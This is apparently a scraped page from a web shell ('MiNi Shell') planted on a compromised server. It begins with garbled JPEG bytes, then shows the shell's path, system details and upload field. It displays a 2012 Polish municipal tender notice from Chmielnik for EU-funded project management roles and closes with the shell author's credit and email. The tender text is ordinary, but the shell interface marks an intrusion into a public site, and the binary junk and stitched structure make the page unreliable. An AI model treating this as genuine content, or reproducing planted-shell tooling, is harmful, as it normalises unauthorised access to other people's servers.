JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/348676-N-2012.html

<p class="kh_header"><b>Chmielnik: Wybór kadry zarządzającej projektem pn.Na szlaku własnej przyszłości.</b><br>
<b>Numer ogłoszenia: 348676 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chmielnik , Plac Kościuszki 7, 26-020 Chmielnik, woj. świętokrzyskie, tel. 41 3543273, faks 41 3543273.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chmielnik.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór kadry zarządzającej projektem pn.Na szlaku własnej przyszłości..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór kadry zarządzającej w ramach projektu pn. Na szlaku własnej przyszłości współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych 
i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
Szczegółowy opis przedmiotu zamówienia:
Zamawiający  dopuszcza składanie ofert częściowych z możliwością zawarcia umowy na każdą część przedmiotu zamówienia osobno. Zamówienie o udzielenie zamówienia prowadzone jest w częściach:

a)	Część I - Kierownik Projektu
b)	Część II - Asystent ds. Organizacyjnych w Chmielniku
c)	Część III - Asystent ds. Organizacyjnych w Piotrkowicach
d)	Część IV -  Asystent ds. Sprawozdawczości

a)	Część I: Kierownik Projektu, którego zadaniem będą:

1.Realizacja projektu według dokumentów programowych i wytycznych dla PO KL. 
2.Zarządzanie przedsięwzięciami na wszystkich etapach realizacji projektu. 
3. Nadzór na prawidłowym przebiegiem realizacji projektu zgodnym z zaplanowanym budżetem 
i harmonogramem. 
4. Kierowanie wykonaniem projektu zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym, przepisami krajowymi i Unii Europejskiej. 
5. Planowanie działań i wywiązywanie się ze wskaźników projektu. 
6. Dokonywanie zakupów zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych 
7. Nadzór nad wydatkami - zatwierdzanie płatności pod względem merytorycznym. 
8. Nadzór nad personelem projektu - w tym dobór specjalistów i nauczycieli do prowadzenia zajęć pozalekcyjnych. 
9. Nadzór nad prowadzeniem dokumentacji związanej z realizacją projektu. 
10. Nadzór nad ewaluacją i ciągłą promocją projektu. 
11. Podejmowanie decyzji związanych z modyfikacją projektu. 
12. Współpraca z księgowością i zarządcą projektu. 
13. Koordynacja rozliczeń finansowych, terminowe sporządzanie i przekazywanie do IP wniosków o płatność wraz z wymaganymi załącznikami. 
14. Współpraca z IP. 
15. Kontakt bieżący z uczestnikami projektu. 
16. Rozwiązywanie problemów i podejmowanie decyzji strategicznych. 
17. Sporządzenie wniosku o płatność końcową i ostateczne rozliczenie projektu.
18. Nadzór nad realizowanymi zakupami dostaw i usług w zakresie zgodności z Prawem zamówień publicznych.
Forma uczestnictwa w projekcie: umowa cywilnoprawna - 32 h/m-c


b)	Część II: Asystent ds. Organizacyjnych w Chmielniku, którego zadaniem będą:

1. Nadzór nad prawidłowym przebiegiem zajęć zgodnie z  harmonogramem zajęć 
i organizacją zapewnienia sal lekcyjnych w budynku gimnazjum w Chmielniku. 
2. Nadzór nad odwozami uczniów po zajęciach. 
3. Nadzór nad dyżurami kadry przy odwozach. 
4. Nadzór  nad organizacją prowiantu dla uczestników projektu. 
5. Organizacja i nadzór nad prawidłowym przebiegiem organizowanych wyjazdów. 
6. Przygotowanie certyfikatów końcowych. 
7. Rozwiązywanie problemów organizacyjnych. 
8. Współpraca z kierownikiem projektu, informowanie o wszelkich problemach wynikających 
z organizacji projektu. 
9. Współpraca z nauczycielami w zakresie realizowanych zadań i osiąganych wskaźników. 
10. Wsparcie personelu projektu w zakresie promocji projektu w sposób zgodny z wytycznymi 
w tym zakresie. 
11. Przygotowywanie i opracowanie dokumentacji niezbędnej do prawidłowej realizacji projektu, 
w tym kart pracy personelu.
Forma uczestnictwa w projekcie: umowa cywilnoprawna - 22 h/m-c


c ) Część III: Asystent ds. Organizacyjnych w Piotrkowicach, którego zadania będą wykonywane we ścisłej współpracy z Asystentem ds. Organizacyjnych w Chmielniku. Jego zadaniem będą:

1. Nadzór nad prawidłowym przebiegiem zajęć zgodnie z harmonogramem zajęć i organizacją sal lekcyjnych w budynku gimnazjum w Piotrkowicach. 
2. Nadzór nad odwozami uczniów po zajęciach. 
3. Nadzór nad dyżurami kadry przy odwozach. 
4. Nadzór  nad organizacją prowiantu dla uczestników projektu. 
5. Organizacja i nadzór nad prawidłowym przebiegiem organizowanych wyjazdów. 
6. Przygotowanie certyfikatów końcowych. 
7. Rozwiązywanie problemów organizacyjnych. 
8. Współpraca z kierownikiem projektu, informowanie o wszelkich problemach wynikających 
z organizacji projektu. 
9. Współpraca z nauczycielami w zakresie realizowanych zadań i osiąganych wskaźników. 
10. Wsparcie personelu projektu w zakresie promocji projektu w sposób zgodny z wytycznymi 
w tym zakresie. 
11. Przygotowywanie i opracowanie dokumentacji niezbędnej do prawidłowej realizacji projektu, 
w tym kart pracy personelu.
Forma uczestnictwa w projekcie: umowa cywilnoprawna - 22 h/m-c


d)	Część IV: Asystent ds. Sprawozdawczości, którego zadaniem będą:

1. Zbieranie i opracowywanie danych na potrzeby monitoringu i sprawozdawczości dotyczącej realizacji projektu. 
2. Kontrola poprawności prowadzonej dokumentacji (listy obecności, potwierdzenia odbioru, dzienniki zajęć itp.). 
3. Przedstawianie Kierownikowi projektu na bieżąco sprawozdań o stanie realizacji zadań
 i o wynikłych nieprawidłowościach. 
4. Sporządzanie kwartalnych raportów z monitoringu i ewaluacji. 
5. Przygotowywanie części merytorycznej wniosków o płatność. 
6. Katalogowanie beneficjentów i prowadzenie sprawozdawczości PEFS. 
7. Monitorowanie wskaźników projektu . 
8. Uczestnictwo w zakupach i ewidencjonowanie wydatków. 
9. Przygotowywanie materiałów do publikacji. 
10. Archiwizowanie dokumentacji. 
11. Współpraca z zespołem zarządzającym projektu przy realizacji zadań ujętych we wniosku aplikacyjnym w celu zapewnienia prawidłowego przepływu informacji.
Forma uczestnictwa w projekcie: umowa cywilnoprawna - 22 h/m-c.

Zadania o których mowa powyżej będą świadczone nieprzerwanie przez cały okres projektu. Przy wykonywaniu przedmiotu zamówienia Wykonawca zobowiązany jest do:
1) świadczenia usług z należytą starannością, zgodnie z najlepszymi praktykami stosowanymi przy usługach zarządzania;
2) świadczenia usług w oparciu o obowiązujące przepisy prawa,
3) poszanowania praw pracowniczych,
4) stosowania się do reguł i standardów obowiązujących u Zamawiającego,
5) przestrzegania norm dotyczących ochrony danych osobowych i informacji niejawnych,
6) udzielania odpowiedzi i wyjaśnień na wezwanie Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu oraz wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz  z informacjami na temat ich kwalifikacji zawodowych i doświadczenia.Warunek powyższy zostanie spełniony, jeżeli Wykonawca wykaże i udokumentuje, że dysponuje lub będzie dysponował osobami zdolnymi do zarządzania projektem na poszczególne części zamówienia spełniającymi następujące wymagania: 

Część I - Kierownik Projektu: 
a) Posiada wykształcenie wyższe (magisterskie).
b) Posiada doświadczenie w zarządzaniu min. 1 projektem współfinansowanym ze środków Unii Europejskiej w ramach PO KL, na stanowisku Kierownika - Koordynatora Projektu.  
c) Biegła znajomość obsługi komputera ( Microsoft Office, Internet, poczta elektroniczna,  Generator Wniosków Płatniczych PO KL itp.)

Dla części I na potwierdzenie należy złożyć:
- kserokopię poświadczoną za zgodność z oryginałem dyplomu ukończenia studiów wyższych,
- kserokopie poświadczone za zgodność z oryginałem dokumentów potwierdzających doświadczenie przy zarządzaniu projektami unijnych itp.
- kserokopie  poświadczona za zgodność z oryginałem dokumentów potwierdzających odbyte szkolenia i ukończone kursy itp.
 
Część II - Asystent do Spraw Organizacyjnych w Chmielniku: 
a) Posiada wykształcenie wyższe (magisterskie).
b) Biegła znajomość obsługi komputera ( Microsoft Office, Internet, poczta elektroniczna itp. ) 
c) Posiada doświadczenie przy realizacji min 1 projektu dofinansowanego ze środków Unii Europejskiej.

Dla części II na potwierdzenie należy złożyć:
- kserokopię poświadczoną za zgodność z oryginałem dyplomu ukończenia studiów wyższych,
- kserokopie poświadczone za zgodność z oryginałem dokumentów odbytych szkoleń i ukończonych kursów;
- kserokopie poświadczone za zgodność z oryginałem dokumentów potwierdzających udział przy realizacji min. 1  projektu unijnego itp.


Część III - Asystent do Spraw Organizacyjnych w Piotrkowicach: 
a) Posiada wykształcenie wyższe (magisterskie).
b) Posiada doświadczenie przy realizacji min. 1 projektu dofinansowanego w ramach funduszy unijnych potwierdzone referencją lub umową itp.
c) Biegła znajomość obsługi komputera ( Microsoft Office, Internet, poczta elektroniczna itp.) 

Dla części III na potwierdzenie należy złożyć:
- kserokopię poświadczoną za zgodność z oryginałem dyplomu ukończenia studiów wyższych,
- kserokopie poświadczone za zgodność z oryginałem odbytych szkoleń i ukończonych kursów,
- kserokopie poświadczone za zgodność z oryginałem dokumentów potwierdzających doświadczenie przy realizacji projektów unijnych itp.

Część IV - Asystent do Spraw Sprawozdawczości: 
a) Posiada wykształcenie wyższe (magisterskie).
b) Posiada doświadczenie przy realizacji min. 1 projektu współfinansowanego ze środków unijnych. 
c) Biegła znajomość obsługi komputera ( Microsoft Office, Internet, poczta elektroniczna itp.) 

Dla części IV na potwierdzenie należy złożyć:
- kserokopię poświadczoną za zgodność z oryginałem dyplomu ukończenia studiów wyższych,
- kserokopie poświadczone za zgodność z oryginałem dokumentów potwierdzających odbyte szkolenia i ukończone kursy,
- kserokopie poświadczone za zgodność z oryginałem dokumentów potwierdzających doświadczenie przy realizacji projektów unijnych itp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia w/w warunku należy złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wprowadza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo
2) Oświadczenie o zrealizowaniu zamówienia siłami własnymi lub z udziałem podwykonawców
3) Oświadczenie o wyrażaniu zgody na przetwarzanie danych osobowych
4) Kserokopie poświadczone za zgodność dokumentów potwierdzających posiadane kwalifikacje i wymagane doświadczenie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany zawartej umowy w zakresie:
Stosownie do art. 144 ustawy Prawo zamówień publicznych Zamawiający zastrzega możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę polegającej na  zmianie i przedłużeniu terminu realizacji umowy z przyczyn niezależnych od Zamawiającego z powodu wystąpienia zdarzeń losowych. 
Zaistnienie jednej z w/w okoliczności  będzie uzasadniało zawarcie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Chmielniku
Plac Kościuszki 7
26-020 Chmielnik
Pokój nr 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy w Chmielniku
Plac Kościuszki 7
26-020 Chmielnik
Pokój nr 102 ( Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest wybór kadry zarządzającej w ramach projektu pn. Na szlaku własnej przyszłości współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych 
i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com